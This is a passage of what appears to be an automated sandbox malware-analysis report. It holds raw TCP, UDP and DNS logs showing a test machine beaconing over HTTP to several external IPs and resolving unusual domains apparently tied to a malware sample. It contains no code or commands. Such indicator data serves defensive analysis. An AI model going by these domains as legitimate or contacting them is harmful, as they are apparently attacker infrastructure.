                                                                                Dec 3, 2024 14:15:36.346638918 CET8049980176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:36.346694946 CET8049980176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:36.346790075 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:36.492917061 CET4998080192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:37.511464119 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:37.631437063 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:37.631527901 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:37.649564028 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:37.769664049 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:37.769701958 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:39.006740093 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:39.006850004 CET8049987176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:39.006953955 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:39.164644957 CET4998780192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:40.183912992 CET4999380192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:40.303845882 CET8049993176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:40.303975105 CET4999380192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:40.317555904 CET4999380192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:40.437531948 CET8049993176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:41.724189043 CET8049993176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:41.724204063 CET8049993176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:41.724344969 CET4999380192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:41.728487015 CET4999380192.168.2.5176.32.38.130
                                                                                Dec 3, 2024 14:15:41.848395109 CET8049993176.32.38.130192.168.2.5
                                                                                Dec 3, 2024 14:15:47.412889957 CET5000680192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:47.532828093 CET8050006161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:47.534518957 CET5000680192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:47.550465107 CET5000680192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:47.670373917 CET8050006161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:48.792321920 CET8050006161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:48.792335987 CET8050006161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:48.792474985 CET8050006161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:48.792520046 CET5000680192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:48.794569969 CET5000680192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:49.055166960 CET5000680192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:50.074631929 CET5000780192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:50.194749117 CET8050007161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:50.194883108 CET5000780192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:50.212371111 CET5000780192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:50.332397938 CET8050007161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:51.495095015 CET8050007161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:51.495193958 CET8050007161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:51.495207071 CET8050007161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:51.495367050 CET5000780192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:51.727051973 CET5000780192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:52.748430014 CET5000880192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:52.868429899 CET8050008161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:52.868590117 CET5000880192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:52.883647919 CET5000880192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:53.003676891 CET8050008161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:53.003704071 CET8050008161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:54.185619116 CET8050008161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:54.185637951 CET8050008161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:54.185697079 CET5000880192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:54.267416000 CET8050008161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:54.267477036 CET5000880192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:54.401823997 CET5000880192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:55.418433905 CET5000980192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:55.538532019 CET8050009161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:55.540721893 CET5000980192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:55.552510023 CET5000980192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:55.672652006 CET8050009161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:56.847404003 CET8050009161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:56.861588955 CET8050009161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:56.861603975 CET8050009161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:56.861613989 CET8050009161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:56.861622095 CET8050009161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:15:56.861807108 CET5000980192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:56.870436907 CET5000980192.168.2.5161.97.168.245
                                                                                Dec 3, 2024 14:15:57.045952082 CET8050009161.97.168.245192.168.2.5
                                                                                Dec 3, 2024 14:16:02.792964935 CET5001080192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:02.913140059 CET8050010103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:02.913244963 CET5001080192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:02.930191994 CET5001080192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:03.050138950 CET8050010103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:04.430200100 CET5001080192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:04.550426960 CET8050010103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:04.550502062 CET5001080192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:05.454576015 CET5001180192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:05.574601889 CET8050011103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:05.578557968 CET5001180192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:05.598521948 CET5001180192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:05.719837904 CET8050011103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:07.104583025 CET5001180192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:07.225158930 CET8050011103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:07.228534937 CET5001180192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:08.121769905 CET5001280192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:08.242813110 CET8050012103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:08.242897987 CET5001280192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:08.260205984 CET5001280192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:08.382105112 CET8050012103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:08.383862019 CET8050012103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:09.773914099 CET5001280192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:09.858510971 CET8050012103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:09.858531952 CET8050012103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:09.858547926 CET8050012103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:09.858580112 CET5001280192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:09.858665943 CET5001280192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:09.858665943 CET5001280192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:09.893961906 CET8050012103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:09.894011021 CET5001280192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:10.792690992 CET5001380192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:11.022623062 CET8050013103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:11.022819042 CET5001380192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:11.032444954 CET5001380192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:11.152872086 CET8050013103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:12.663497925 CET8050013103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:12.663518906 CET8050013103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:12.663659096 CET8050013103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:12.663681984 CET5001380192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:12.663726091 CET5001380192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:12.667222977 CET5001380192.168.2.5103.75.185.22
                                                                                Dec 3, 2024 14:16:12.787229061 CET8050013103.75.185.22192.168.2.5
                                                                                Dec 3, 2024 14:16:18.223922014 CET5001480192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:18.344017029 CET8050014155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:18.344135046 CET5001480192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:18.358870029 CET5001480192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:18.478862047 CET8050014155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:19.609900951 CET8050014155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:19.609958887 CET8050014155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:19.610663891 CET5001480192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:19.870618105 CET5001480192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:20.886436939 CET5001580192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:21.006349087 CET8050015155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:21.008755922 CET5001580192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:21.024667025 CET5001580192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:21.145003080 CET8050015155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:22.265120983 CET8050015155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:22.265165091 CET8050015155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:22.265274048 CET5001580192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:22.539613962 CET5001580192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:23.558453083 CET5001680192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:23.678468943 CET8050016155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:23.678652048 CET5001680192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:23.693845987 CET5001680192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:23.813826084 CET8050016155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:23.813985109 CET8050016155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:24.990312099 CET8050016155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:24.990608931 CET8050016155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:24.994548082 CET5001680192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:25.198472023 CET5001680192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:26.215300083 CET5001780192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:26.335402966 CET8050017155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:26.335536957 CET5001780192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:26.344985008 CET5001780192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:26.464958906 CET8050017155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:27.647408009 CET8050017155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:27.647464991 CET8050017155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:27.647591114 CET5001780192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:27.652462006 CET5001780192.168.2.5155.94.253.4
                                                                                Dec 3, 2024 14:16:27.772882938 CET8050017155.94.253.4192.168.2.5
                                                                                Dec 3, 2024 14:16:33.232656956 CET5001880192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:33.352680922 CET8050018208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:33.352904081 CET5001880192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:33.368778944 CET5001880192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:33.489157915 CET8050018208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:34.591742039 CET8050018208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:34.591819048 CET5001880192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:34.883399963 CET5001880192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:35.003458977 CET8050018208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:35.961177111 CET5001980192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:36.081933022 CET8050019208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:36.081999063 CET5001980192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:36.103821993 CET5001980192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:36.225233078 CET8050019208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:37.336679935 CET8050019208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:37.336817980 CET5001980192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:37.618460894 CET5001980192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:37.738528967 CET8050019208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:38.650451899 CET5002080192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:38.770539999 CET8050020208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:38.777044058 CET5002080192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:38.802494049 CET5002080192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:38.922688007 CET8050020208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:38.922862053 CET8050020208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:39.982647896 CET8050020208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:39.982733011 CET5002080192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:40.305574894 CET5002080192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:40.426749945 CET8050020208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:41.351769924 CET5002180192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:41.472815037 CET8050021208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:41.472912073 CET5002180192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:41.483920097 CET5002180192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:41.604032040 CET8050021208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:43.000658035 CET8050021208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:43.000711918 CET8050021208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:43.000720978 CET8050021208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:43.000863075 CET8050021208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:43.000879049 CET5002180192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:43.000973940 CET5002180192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:43.006464005 CET5002180192.168.2.5208.91.197.27
                                                                                Dec 3, 2024 14:16:43.126740932 CET8050021208.91.197.27192.168.2.5
                                                                                Dec 3, 2024 14:16:48.346384048 CET5002280192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:48.466337919 CET8050022217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:48.466420889 CET5002280192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:48.483681917 CET5002280192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:48.603869915 CET8050022217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:49.806359053 CET8050022217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:49.806374073 CET8050022217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:49.806431055 CET5002280192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:49.806468964 CET8050022217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:49.806509972 CET5002280192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:49.993949890 CET5002280192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:51.014472008 CET5002380192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:51.134531975 CET8050023217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:51.134831905 CET5002380192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:51.149569035 CET5002380192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:51.269814968 CET8050023217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:52.462349892 CET8050023217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:52.462418079 CET8050023217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:52.462424994 CET8050023217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:52.462476969 CET5002380192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:52.664562941 CET5002380192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:53.684748888 CET5002480192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:53.804898977 CET8050024217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:53.805013895 CET5002480192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:53.823158026 CET5002480192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:53.943171978 CET8050024217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:53.943334103 CET8050024217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:55.182305098 CET8050024217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:55.182400942 CET8050024217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:55.182406902 CET8050024217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:55.183068037 CET5002480192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:55.336968899 CET5002480192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:56.356472969 CET5002580192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:56.476572990 CET8050025217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:56.476725101 CET5002580192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:56.528302908 CET5002580192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:56.650013924 CET8050025217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:57.765364885 CET8050025217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:57.765403986 CET8050025217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:57.765417099 CET8050025217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:57.765544891 CET8050025217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:57.765589952 CET5002580192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:57.765878916 CET8050025217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:16:57.765923023 CET5002580192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:57.766635895 CET5002580192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:57.773964882 CET5002580192.168.2.5217.160.0.200
                                                                                Dec 3, 2024 14:16:57.893944979 CET8050025217.160.0.200192.168.2.5
                                                                                Dec 3, 2024 14:17:04.892879009 CET5002680192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:05.013344049 CET8050026154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:05.014588118 CET5002680192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:05.028929949 CET5002680192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:05.149616003 CET8050026154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:06.539514065 CET5002680192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:06.659915924 CET8050026154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:06.659984112 CET5002680192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:07.560728073 CET5002780192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:07.681092978 CET8050027154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:07.684809923 CET5002780192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:07.700752974 CET5002780192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:07.821227074 CET8050027154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:09.212414026 CET5002780192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:09.332993031 CET8050027154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:09.333127022 CET5002780192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:10.236407995 CET5002880192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:10.375341892 CET8050028154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:10.375427961 CET5002880192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:10.391562939 CET5002880192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:10.512341022 CET8050028154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:10.512353897 CET8050028154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:11.899708033 CET5002880192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:12.020535946 CET8050028154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:12.020627022 CET5002880192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:12.917409897 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:13.038002968 CET8050029154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:13.040757895 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:13.049207926 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:13.169527054 CET8050029154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:16.246164083 CET8050029154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:16.246247053 CET8050029154.70.82.246192.168.2.5
                                                                                Dec 3, 2024 14:17:16.246315002 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:16.248871088 CET5002980192.168.2.5154.70.82.246
                                                                                Dec 3, 2024 14:17:16.369482040 CET8050029154.70.82.246192.168.2.5

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 3, 2024 14:13:57.238244057 CET6372553192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:13:58.059077024 CET53637251.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:14:14.871596098 CET6229753192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:14:15.883691072 CET6229753192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:14:16.443689108 CET53622971.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:14:17.073652983 CET53622971.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:14:31.433783054 CET6466053192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:14:32.103765011 CET53646601.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:14:46.782810926 CET5126653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:14:47.685944080 CET53512661.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:15:02.247411966 CET5082953192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:15:02.525659084 CET53508291.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:15:16.949516058 CET5352853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:15:17.406455040 CET53535281.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:15:31.778323889 CET5909653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:15:32.183105946 CET53590961.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:15:46.748620987 CET6278853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:15:47.407557964 CET53627881.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:16:01.875643015 CET6325953192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:16:02.787623882 CET53632591.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:16:17.683697939 CET5102853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:16:18.220566034 CET53510281.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:16:32.668149948 CET4943553192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:16:33.228538990 CET53494351.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:16:48.013221025 CET5062853192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:16:48.343424082 CET53506281.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:17:02.778572083 CET6308653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:17:03.773994923 CET6308653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:17:04.789541960 CET6308653192.168.2.51.1.1.1
                                                                                Dec 3, 2024 14:17:04.888649940 CET53630861.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:17:04.927383900 CET53630861.1.1.1192.168.2.5
                                                                                Dec 3, 2024 14:17:05.018323898 CET53630861.1.1.1192.168.2.5

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 3, 2024 14:13:57.238244057 CET192.168.2.51.1.1.10x8c27Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:14:14.871596098 CET192.168.2.51.1.1.10x8abStandard query (0)www.5tuohbpzyj9.buzzA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:14:15.883691072 CET192.168.2.51.1.1.10x8abStandard query (0)www.5tuohbpzyj9.buzzA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:14:31.433783054 CET192.168.2.51.1.1.10x7045Standard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:14:46.782810926 CET192.168.2.51.1.1.10x9a0dStandard query (0)www.phoenix88.sbsA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:15:02.247411966 CET192.168.2.51.1.1.10xe4cStandard query (0)www.ana-silverco.shopA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:15:16.949516058 CET192.168.2.51.1.1.10x3bacStandard query (0)www.gadgetre.infoA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:15:31.778323889 CET192.168.2.51.1.1.10xd225Standard query (0)www.acc888ommodate.xyzA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:15:46.748620987 CET192.168.2.51.1.1.10x48f0Standard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:01.875643015 CET192.168.2.51.1.1.10x9430Standard query (0)www.taxitayninh365.siteA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:17.683697939 CET192.168.2.51.1.1.10x551eStandard query (0)www.rtpmesinkoin.clickA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:32.668149948 CET192.168.2.51.1.1.10x7267Standard query (0)www.cortisalincontrol.netA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:16:48.013221025 CET192.168.2.51.1.1.10x7d2eStandard query (0)www.carsten.studioA (IP address)IN (0x0001)false
                                                                                Dec 3, 2024 14:17:02.778572083 CET192.168.2.51.1.1.10x5c23Standard query (0)www.conseilnsaftogo.orgA (IP address)IN (0x0001)false
